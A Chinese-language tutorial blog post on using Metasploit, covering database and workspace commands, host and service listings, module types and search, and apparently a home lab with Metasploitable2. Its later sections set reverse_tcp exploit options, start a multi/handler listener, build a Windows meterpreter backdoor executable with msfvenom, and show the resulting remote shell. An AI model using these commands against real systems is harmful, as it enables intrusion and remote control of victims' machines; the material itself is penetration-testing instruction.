admin
MSF用法:命令、模块、扫描、爆破、后门、后渗透
02/25
本文最后更新于2022年08月05日,已超过238天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode。
msf目录结构
/usr/share/metasploit-framework1、modules
2、plugins:插件
3、tools:工具
4、msfvenom:木马制作
msf数据库
数据库操作
msfdb init # start and initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
msfdb status # check service status
msfdb run # start the database and run msfconsole
db_status:
查看MSF有没有连接上后台数据库。如果没有连上数据库,在终端输入msfdb start后再启动MSF。没有连接上数据库MSF也是可以使用的,只是连接上了的话,我们渗透过程中获取的一些信息可以保存下来,比如目标机器的账号密码信息等。
db_rebuild_cache:
这个命令将所有模块信息缓存到数据库中,通过数据库检索效率就高很多了。
db_disconnect:
断开数据库连接。
db_connect:
msf默认连上postgresql的msf数据库。可以用db_connect连接我们指定的数据库。如果要使用配置文件进行连接,默认的数据库配置文件为/usr/share/metasploit-framework/config/database.yml,可以参考这个文件进行编写。
db_nmap:
集成在msf中的namp扫描命令。不同的是db_nmap扫描的结果会自动保存到数据库中。
可以输入hosts查看扫描到的主机信息
如果数据多,可以用 hosts IP 进行过滤;hosts -u 查看up状态的机器;使用 hosts -c 列名[,列名] 指定要看的列;使用 hosts -S 进行搜索,比如hosts -S windows。
输入services可以查看主机开放的端口情况
creds:
查看扫描出来的密码信息
vulns:
查看扫描出来的漏洞信息
loot:
有些账号密码我们可能没有获取到明文信息,可是经过加密的hash值,可以用这个显示
db_export/db_import:
数据库的导入和导出
db_export -f /root/msfbak.xml
nmap导出的也可以导入到msf中
nmap -A 192.168.1.113 -oX nmap.xml => db_import -f /root/nmap.xml
service postgrsql
初始化
msfdb init
# msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema启动
msf start
# msfdb start
[i] Database already started确认连接状态
db_staus
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.workspace工作区
Metasploit中有工作区的概念,可以用来隔离不同的渗透测试任务,从而避免混淆不同的测试。默认工作区是default,输入workspace查看。
msf6 > workspace -h
Usage:
workspace List workspaces
workspace [name] Switch workspace
OPTIONS:
-a, --add <name> Add a workspace.
-d, --delete <name> Delete a workspace.
-D, --delete-all Delete all workspaces.
-h, --help Help banner.
-l, --list List workspaces.
-r, --rename <old> <new> Rename a workspace.
-S, --search <name> Search for a workspace.
-v, --list-verbose List workspaces verbosely.
workspace -a name增加工作区
workspace -a zoqa
[*] Added workspace: zoqa
[*] Workspace: zoqa
worlspace -l 显示所有工作区
msf6 > workspace -l
default
* zoqaworkspace name 切换工作区
msf6 > workspace zoqa
[*] Workspace: zoqaworkspace -v 显示工作区信息
msf6 > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
default 24 0 0 0 0 0
* zoqa 0 0 0 0 0 0hosts主机信息
Usage: hosts [ options ] [addr1 addr2 ...]
OPTIONS:
-a, --add <host> Add the hosts instead of searching
-c, --columns <columns> Only show the given columns (see list below)
-C, --columns-until-restart <columns> Only show the given columns until the next restart (see list below)
-d, --delete <hosts> Delete the hosts instead of searching
-h, --help Show this help information
-i, --info <info> Change the info of a host
-m, --comment <comment> Change the comment of a host
-n, --name <name> Change the name of a host
-O, --order <column id> Order rows by specified column number
-o, --output <filename> Send output to a file in csv format
-R, --rhosts Set RHOSTS from the results of the search
-S, --search <filter> Search string to filter by
-t, --tag Add or specify a tag to a range of hosts
-u, --up Only show hosts which are up
Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
hosts 显示所有host信息
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168 08:3A:3
.2.1 8:73:31
:F9
192.168 18:C0:4
.2.125 D:E1:AC
:00
192.168 00:0c:2 Linux server
.2.126 9:b0:76
:35
hosts -a 增加host
msf6 > hosts -a 192.168.2.216
[*] Time: 2022-07-13 01:27:09 UTC Host: host=192.168.2.216hosts -d 删除
msf6 > hosts -d 192.168.2.113
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168 18:C0:4
.2.113 D:C9:3A
:D5
[*] Deleted 1 hostshosts -n / -i /-m 备注name/info/comment信息
msf6 > hosts 192.168.2.1 -i H3C
msf6 > hosts 192.168.2.1 -n h3c-gateway
msf6 > hosts 192.168.2.1 -m awesome
msf6 > hosts -v
Hosts
=====
addres mac name os_name os_flavo os_sp purpose info comments
s r
------ --- ---- ------- -------- ----- ------- ---- --------
192.16 08:3A: h3c-gat H3C awesome
8.2.1 38:73: eway
31:F9
192.16 18:C0:
8.2.11 4D:C9:
8 3A:98
hosts -S 搜索
msf6 > hosts -S linux
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168 00:0c:2 Linux server
.2.219 9:b0:76
:35hosts -R 快捷设置rhosts(搭配-S 搜索更佳)
######################设置单个host#################
msf6 auxiliary(scanner/portscan/tcp) > hosts 192.168.2.178 -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168 00:E0:4
.2.178 C:68:0D
:7F
RHOSTS => 192.168.2.178
######################搭配-S 搜索###############
msf6 auxiliary(scanner/portscan/tcp) > hosts -S linux -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168 00:0c:2 Linux server
.2.219 9:b0:76
:35
RHOSTS => 192.168.2.219
############设置多个host(文件列表形式)################
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
Hosts
=====
addres mac name os_name os_flavo os_sp purpose info comments
s r
------ --- ---- ------- -------- ----- ------- ---- --------
192.16 08:3A: h3c-gat H3C awesome
8.2.1 38:73: eway
31:F9
192.16 18:C0:
8.2.11 4D:C9:
8 3A:98
RHOSTS => file:/tmp/msf-db-rhosts-20220712-1736-i3se2
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent port
s to check per host
DELAY 0 yes The delay between connections
, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maxi
mum value by which to +/- DEL
AY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,
110-900)
RHOSTS file:/tmp/msf-db-r yes The target host(s), see https
hosts-20220712-173 ://github.com/rapid7/metasplo
6-i3se2 it-framework/wiki/Using-Metas
ploit
THREADS 1 yes The number of concurrent thre
ads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in
milliseconds
msf6 auxiliary(scanner/portscan/tcp) > set ports 22
ports => 22
msf6 auxiliary(scanner/portscan/tcp) > run
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 3 of 25 hosts (12% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 5 of 25 hosts (20% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 8 of 25 hosts (32% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 10 of 25 hosts (40% complete)
[+] 192.168.2.200: - 192.168.2.200:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 13 of 25 hosts (52% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 15 of 25 hosts (60% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 18 of 25 hosts (72% complete)
[+] 192.168.2.216: - 192.168.2.216:22 - TCP OPEN
[+] 192.168.2.219: - 192.168.2.219:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 20 of 25 hosts (80% complete)
[+] 192.168.2.228: - 192.168.2.228:22 - TCP OPEN
[+] 192.168.2.240: - 192.168.2.240:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 23 of 25 hosts (92% complete)
[+] 192.168.2.241: - 192.168.2.241:22 - TCP OPEN
[+] 192.168.2.252: - 192.168.2.252:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 25 of 25 hosts (100% complete)
[*] Auxiliary module execution completed
services 服务信息
Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]
OPTIONS:
-a, --add Add the services instead of searching.
-c, --column <col1,col2> Only show the given columns.
-d, --delete Delete the services instead of searching.
-h, --help Show this help information.
-O, --order <column id> Order rows by specified column number.
-o, --output <filename> Send output to a file in csv format.
-p, --port <ports> Search for a list of ports.
-r, --protocol <protocol> Protocol type of the service being added [tcp|udp].
-R, --rhosts Set RHOSTS from the results of the search.
-s, --name <name> Name of the service to add.
-S, --search <filter> Search string to filter by.
-u, --up Only show services which are up.
-U, --update Update data for existing service.
Available columns: created_at, info, name, port, proto, state, updated_at
services 显示所有服务信息
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2. 21 tcp ftp open vsftpd 2.3.4
219
192.168.2. 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1
219 protocol 2.0
192.168.2. 23 tcp telnet open Linux telnetd
219
192.168.2. 25 tcp smtp open Postfix smtpd
219
services -a 增加
service -d 删除
services -p 搜索端口
msf6 > services -p 22
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2. 22 tcp open
200
192.168.2. 22 tcp open
216
192.168.2. 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protoco
219 l 2.0
192.168.2. 22 tcp open
228
192.168.2. 22 tcp open
240
192.168.2. 22 tcp open
241
192.168.2. 22 tcp open
252servicces -S 搜索信息
msf6 > services -S mysql
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2.219 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5services -c [options] -S 多条件搜索
msf6 > services -c name,port,info -S Apache
Services
========
host name port info
---- ---- ---- ----
192.168.2.219 http 80 Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.2.219 ajp13 8009 Apache Jserv Protocol v1.3
192.168.2.219 http 8180 Apache Tomcat/Coyote JSP engine 1.1导入数据库
db_import [file]
Usage: db_import <filename> [file2...]
Filenames can be globs like *.xml, or **/*.xml which will search recursively
Currently supported file types include:
Acunetix
Amap Log
Amap Log -m
Appscan
Burp Session XML
Burp Issue XML
CI
Foundstone
FusionVM XML
Group Policy Preferences Credentials
IP Address List
IP360 ASPL
IP360 XML v3
Libpcap Packet Capture
Masscan XML
Metasploit PWDump Export
Metasploit XML
Metasploit Zip Export
Microsoft Baseline Security Analyzer
NeXpose Simple XML
NeXpose XML Report
Nessus NBE Report
Nessus XML (v1)
Nessus XML (v2)
NetSparker XML
Nikto XML
Nmap XML
OpenVAS Report
OpenVAS XML
Outpost24 XML
Qualys Asset XML
Qualys Scan XML
Retina XML
Spiceworks CSV Export
Wapiti XML导入nmap结果
nmap保存结果到文件
-oN
-oX
-oS
-oG
-oA
# nmap -sP 192.168.2.0/24 -oX result.xmlmsf导入
msf6 > db_import /root/Desktop/result.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.13.4'
[*] Importing host 192.168.2.1
[*] Importing host 192.168.2.113
[*] Importing host 192.168.2.118
[*] Successfully imported /root/Desktop/result.xmlmsf模块
MSF默认存放模块的目录如下
/usr/share/metasploit-framework/modules/cd /usr/share/metasploit-framework/
msf6 > ls
[*] exec: ls
app lib msfrpc ruby
config metasploit-framework.gemspec msfrpcd script-exploit
data modules msfupdate script-password
db msfconsole msfvenom script-recon
documentation msfd msf-ws.ru scripts
Gemfile msfdb plugins tools
Gemfile.lock msf-json-rpc.ru Rakefile vendor
##############################模块目录#######################
cd modules/
msf6 > ls
[*] exec: ls
auxiliary encoders evasion exploits nops payloads post
######################auxiliary模块#########################
msf6 > cd auxiliary/
msf6 > ls
[*] exec: ls
admin client docx example.rb gather scanner spoof vsploit
analyze cloud dos fileformat parser server sqli
bnat crawler example.py fuzzers pdf sniffer voip
########################dos相关###############################
msf6 > cd dos
msf6 > ls
[*] exec: ls
android dhcp hp misc rpc scada solaris tcp wireshark
apple_ios dns http ntp samba smb ssl upnp
cisco freebsd mdns pptp sap smtp syslog windows
###########################Windows相关########################
msf6 > cd windows
msf6 > ls
[*] exec: ls
appian browser ftp games http llmnr nat rdp smb smtp ssh tftp
#########################ftp脚本##############################
msf6 > cd ftp
msf6 > ls
[*] exec: ls
filezilla_admin_user.rb iis_list_exhaustion.rb winftp230_nlst.rb
filezilla_server_port.rb solarftp_user.rb xmeasy560_nlst.rb
guildftp_cwdlist.rb titan626_site.rb xmeasy570_nlst.rb
iis75_ftpd_iac_bof.rb vicftps50_list.rb
MSF有6个模块,分别对上面目录下的6个子文件夹:
(1)auxiliary:执行信息搜集、枚举、指纹探测、扫描等功能的辅助模块
(2)encoders:对payload进行加密,躲避AV检查的模块
(3)evasion:逃避检查
(3)exploits:/usr/share/metasploit-framework/modules/exploits目录下全是攻击时的利用代码
(4)nops:提高payload稳定性及维持大小
(5)paylodas:三种payload
singles:all-in-one,各种功能都有的payload,占用空间比较大
stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
stages:利用stager建议的连接,下载后续payload
(6)post: 后渗透模块auxiliary
负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块
exploits
利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)
payloads
成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。
- single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
- stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
- stages:利用stagers建立的连接下载后续payload
encoders
对payload进行加密,躲避AntiVirus检查的模块
nops
提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。
post
后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作
Exploit模块
############################Exploit模块###############################
msf6 > cd exploits/
msf6 > ls
[*] exec: ls
aix dialup firefox mainframe qnx
android example_linux_priv_esc.rb freebsd multi solaris
apple_ios example.py hpux netware unix
bsd example.rb irix openbsd windows
bsdi example_webapp.rb linux osx
###############################Linux相关###############################
msf6 > cd linux
msf6 > ls
[*] exec: ls
antivirus games imap mysql pptp samba ssh
browser http local pop3 proxy smtp telnet
ftp ids misc postgres redis snmp upnp
###############################ssh脚本##################################
msf6 > cd ssh
msf6 > ls
[*] exec: ls
ceragon_fibeair_known_privkey.rb
cisco_ucs_scpuser.rb
exagrid_known_privkey.rb
f5_bigip_known_privkey.rb
ibm_drm_a3user.rb
loadbalancerorg_enterprise_known_privkey.rb
mercurial_ssh_exec.rb
microfocus_obr_shrboadmin.rb
quantum_dxi_known_privkey.rb
quantum_vmpro_backdoor.rb
solarwinds_lem_exec.rb
symantec_smg_ssh.rb
vmware_vdp_known_privkey.rb
vyos_restricted_shell_privesc.rb
分为Active Exploit和Passive Exploit
Active Exploit
(主动攻击,主要是服务端的漏洞,将payload发送给目标服务端侦听的端口)这个就是我们直接攻击,不开防火墙可以,开了不行
目标提供了某种服务,服务存在漏洞
- use exploit/windows/smb/ms17_010_psexec
- set RHOST 192.168.1.100
- set PAYLOAD windows/shell/reverse_tcp
- set LHOST 192.168.1.1
- set LPORT 4444
- set SMBUSER user1
- set SMBPASS pass1
- exploit
Passive Exploit
(被动攻击,主要是客户端的程序)这个就是我们设陷阱,等目标上钩,这个可以针对开了防火墙的,配合社会工程学被攻击者通常不开放端口或开放端口上的服务没有漏洞,漏洞存在于受害者机器上的客户端软件上。客户端需要访问某些远程服务器上的服务,当它访问的时候,当在服务器上放置了漏洞利用代码,由于客户端程序存在漏洞,服务器也会将这些漏洞利用代码作为响应报文返回给客户端,造成客户端漏洞被利用。
- use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
- set URIPATH /
- set PAYLOAD windows/shell/reverse_tcp
- set LHOST 192.168.1.1
- set PORT 4444
- exploit
msfconsole
控制台命令支持TAB补全,支持外部命令的执行(系统命令)
核心命令
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
模块命令
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
clearm Clear the module stack
favorite Add module(s) to the list of favorite modules
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
任务命令
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
run/exploit -j 后台运行
jobs 显示所有任务常用命令
help或?:
显示msfconsole可以使用的命令。help <command>,显示某一命令的用法。
connect:
可以理解成MSF中的nc命令,可以使用connect -h查看详细用法。
connect [options] <host> <port>
show:
用show命令查看msf提供的资源。在根目录下执行的话,由于有些模块资源比较多,需要执行show命令要较长的时间
show exploits:查看可以使用的exploit
除了exploits,还支持all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options。有些选项需要用use使用一个模块后才能使用,比如给show targets。
search:
搜索模块
简单搜索:seach ms17_010
多条件搜索缩小范围:search name:mysql type:exploit platform:linux
info:
查看模块的信息
info <module name>
如果用use使用了一个模块,直接输入info即可查看
use:
search找到模块后,用use使用模块
use exploit/windows/smb/ms08_067_netapi
用use使用一个模块后,可以使用 show options查看我们需要配置的选项、使用show targets选择目标主机系统、使用show payloads选择payload、使用show advanced查看高级参数、使用show evasion查看用来做混淆、逃避的模块。
set/setg:
设置参数,比如要渗透的主机IP、payload等。我们可以用show missing查看没有设置的参数
setg是设置全局变量,避免每个模块都要输入相同的参数
unset/unsetg:
取消设置参数。unsetg是取消设置的全局变量
save:
设置的参数在下一次启动的时候不会生效,可以用save保存我们使用过程的设置。
check:
检查目标是否真的存在这个漏洞,大部分模块没有check功能
back:
回到msfconsole根目录
run或exploit:
开始使用模块
run/exploit -j:以后台的方式运行
jobs:
显示运行和后台任务
sessions:
查看当前已经建立的sessions,说明已经拿到了shell
sessions -i id 可以进入一个session交互
load/unload:
调用外部的扫描命令,比如openvas
loadpath:
加载自己的模块
route:
添加一条路由。比如发往某个子网的流量都通过攻陷的机器发送。
banner —— 显示banner信息
search 搜索
搜索 名字、作者、CVE编号、端口、平台...
Usage: search [<options>] [<keywords>:<value>]
Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.
OPTIONS:
-h, --help Help banner
-I, --ignore Ignore the command if the only match has the same name as the search
-o, --output <filename> Send output to a file in csv format
-r, --sort-descending <column> Reverse the order of search results to descending order
-S, --filter <filter> Regex pattern used to filter search results
-s, --sort-ascending <column> Sort search results by the specified column in ascending order
-u, --use Use module if there is one result
Keywords:
aka : Modules with a matching AKA (also-known-as) name
author : Modules written by this author
arch : Modules affecting this architecture
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
check : Modules that support the 'check' method
date : Modules with a matching disclosure date
description : Modules with a matching description
fullname : Modules with a matching full name
mod_time : Modules with a matching modification date
name : Modules with a matching descriptive name
path : Modules with a matching path
platform : Modules affecting this platform
port : Modules with a matching port
rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
ref : Modules with a matching ref
reference : Modules with a matching reference
target : Modules affecting this target
type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
Supported search columns:
rank : Sort modules by their exploitabilty rank
date : Sort modules by their disclosure date. Alias for disclosure_date
disclosure_date : Sort modules by their disclosure date
name : Sort modules by their name
type : Sort modules by their type
check : Sort modules by whether or not they have a check method
Examples:
search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux
search cve:2009 -s name
search type:exploit -s type -r
rank表示好用级别:normal(正常),excellent(优秀),good(良好),average(平均)
直接搜索信息
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
搜索类型search type:[exploit、auxiliary...]
msf6 > search mysql type:exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE
1 exploit/unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection
2 exploit/linux/http/librenms_collectd_cmd_inject 2019-07-15 excellent Yes LibreNMS Collectd Command Injection
3 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
搜索端口search port :3389
msf6 > search port:3389
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
2 auxiliary/scanner/rdp/rdp_scanner normal No Identify endpoints speaking the Remote Desktop Protocol (RDP)
3 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
4 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
5 exploit/windows/rdp/rdp_doublepulsar_rce 2017-04-14 great Yes RDP DOUBLEPULSAR Remote Code Execution搜索CVE ID search cve:2020
msf6 > search cve:2020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_apisix_api_default_token_rce 2020-12-07 excellent Yes APISIX Admin API default access token RCE
1 exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce 2020-02-17 excellent Yes Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE
2 exploit/linux/misc/aerospike_database_udf_cmd_exec 2020-07-31 great Yes Aerospike Database UDF Lua Code Execution
3 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
混合搜索 search cve:2020 type:exploit
msf6 > search cve:2020 type:exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_apisix_api_default_token_rce 2020-12-07 excellent Yes APISIX Admin API default access token RCE
1 exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce 2020-02-17 excellent Yes Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE
2 exploit/linux/misc/aerospike_database_udf_cmd_exec 2020-07-31 great Yes Aerospike Database UDF Lua Code Execution
3 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
show
all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favoritesshow options 显示可选设置
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line
info / show info 显示信息
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show info
Name: SSH Username Enumeration
Module: auxiliary/scanner/ssh/ssh_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
kenkeiras
Dariusz Tytko
Michal Sajdak
Qualys
wvu <wvu@metasploit.com>
Module side effects:
ioc-in-logs
account-lockouts
Module reliability:
crash-service-down
Available actions:
Name Description
---- -----------
Malformed Packet Use a malformed packet
Timing Attack Use a timing attack
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list
set /unset /setg/unsetg 设置/清除参数/设置/清除全局参数
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > unset username
Unsetting username...
msf6 > setg rhost 192.168.2.219
rhost => 192.168.2.219run /exploit 执行脚本
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.219:22 - SSH - Using malformed packet technique
[*] 192.168.2.219:22 - SSH - Starting scan
[+] 192.168.2.219:22 - SSH - User 'root' found
[+] 192.168.2.219:22 - SSH - User 'msfadmin' found
[*] Scanned 1 of 1 hosts (100% complete)msf 渗透
靶机metesploitable2
1.弱口令漏洞(如vnc、mysql、ssh、ftp等)
2.Samba MS-RPC Shell命令注入漏洞
3.Vsftpd源码包后门漏洞
4.UnreallRCd后门漏洞
5.Linux NFS共享目录配置漏洞
6.Java RMI Server命令执行漏洞
7.root用户弱口令漏洞
8.Tomcat管理台默认口令漏洞
9.Distcc后门漏洞
10.Samba syslink默认配置目录遍历漏洞
11.PHP CGI参数注入漏洞
12.DRuby远程代码执行漏洞
13.Ingreslock后门漏洞
14.Rlogin后门漏洞
后门
use exploit/multi/handler #使用监听模块
Windows后门
设置payload reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp设置参数
#####
show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
set lport 9999
set lhost 192.168.2.200后台运行监听
run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.2.200:9999 生成后门程序
-p是选择一个payload(攻击载荷), LHOST是kali机的IP,LPORT是端口,-f选择程序的后缀,-o 给程序命名
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.200 lport=9999 -f exe -o winshell2.exe在目的主机上运行程序即可自动连接kali。
反弹shell
在目标主机运行后门后成功建立连接。
[*] Sending stage (200262 bytes) to 192.168.2.208
[*] Meterpreter session 1 opened (192.168.2.200:9999 -> 192.168.2.208:49827 ) at 2022-07-13 05:15:58 -0400出现meterpreter输入shell进入交互
meterpreter > shell
Process 2292 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ����
C:\Users\Administrator\Desktop>whoami
whoami
win10x64-edu\administrator
乱码输入chcp 65001 设置utf8字符模式
查看网络连接
可以发现192.168.2.208:49938 -> 192.168.2.200:9999的已建立连接
C:\Users\Administrator\Desktop>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
